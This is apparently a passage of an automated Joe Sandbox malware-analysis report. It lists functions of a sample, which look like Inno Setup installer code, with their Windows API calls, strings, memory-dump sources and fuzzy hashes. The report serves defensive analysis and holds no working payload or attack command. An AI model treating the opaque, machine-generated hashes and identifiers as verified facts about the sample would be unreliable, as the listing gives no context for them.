                                                                                                                            Function 0044CFC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DrawText$EmptyRect
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 182455014-2867612384
                                                                                                                            • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                                            • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                                                            • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                                            • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042EF74 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                                                            • String ID: ...\
                                                                                                                            • API String ID: 3133960002-983595016
                                                                                                                            • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                                            • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                                                            • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                                            • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                                            • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                                            • RegisterClassA.USER32(?), ref: 004164CE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Class$InfoRegisterUnregister
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 3749476976-2766056989
                                                                                                                            • Opcode ID: e22f6c67811b2b5558443c1260ef7bf478b7365ff617af782cc186aba818ddba
                                                                                                                            • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                                                            • Opcode Fuzzy Hash: e22f6c67811b2b5558443c1260ef7bf478b7365ff617af782cc186aba818ddba
                                                                                                                            • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00498210 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Attributes$Move
                                                                                                                            • String ID: isRS-%.3u.tmp
                                                                                                                            • API String ID: 3839737484-3657609586
                                                                                                                            • Opcode ID: 1f4ba81bd314e92a31c307d6850739873bb922dca52444ea26c7a0748bf5c42b
                                                                                                                            • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                                                            • Opcode Fuzzy Hash: 1f4ba81bd314e92a31c307d6850739873bb922dca52444ea26c7a0748bf5c42b
                                                                                                                            • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitMessageProcess
                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                            • API String ID: 1220098344-2970929446
                                                                                                                            • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                            • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                                            • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                            • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00456BFC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                                            • API String ID: 1312246647-2435364021
                                                                                                                            • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                                            • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                                                                                            • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                                                                                            • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00457154 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                                                                                            Strings
                                                                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                                                                                            • Failed to create DebugClientWnd, xrefs: 004571D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                                                            • API String ID: 3850602802-3720027226
                                                                                                                            • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                                            • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                                                                                            • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                                                                                            • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004786EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                            • GetFocus.USER32 ref: 00478757
                                                                                                                            • GetKeyState.USER32(0000007A), ref: 00478769
                                                                                                                            • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                                                                            • String ID: Wnd=$%x
                                                                                                                            • API String ID: 1381870634-2927251529
                                                                                                                            • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                                            • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                                                                                            • Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                                                                                            • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046E610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$File$LocalSystem
                                                                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                                                                            • API String ID: 1748579591-1013271723
                                                                                                                            • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                                            • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                                                                                            • Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                                                                                            • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00453F76 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                                                                            • String ID: DeleteFile$MoveFile
                                                                                                                            • API String ID: 3024442154-139070271
                                                                                                                            • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                                            • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                                                                                            • Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                                                                                            • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00459364 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen
                                                                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                                                            • API String ID: 47109696-2631785700
                                                                                                                            • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                                            • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                                                            • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                                                            • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00483BC4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                                                            Strings
                                                                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                                                            • CSDVersion, xrefs: 00483BFC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                                                            • API String ID: 3677997916-1910633163
                                                                                                                            • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                                            • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                                                            • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                                                            • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042D8F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                                                            • API String ID: 1646373207-4063490227
                                                                                                                            • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                                            • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                                                            • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                                                            • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042EB54 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON
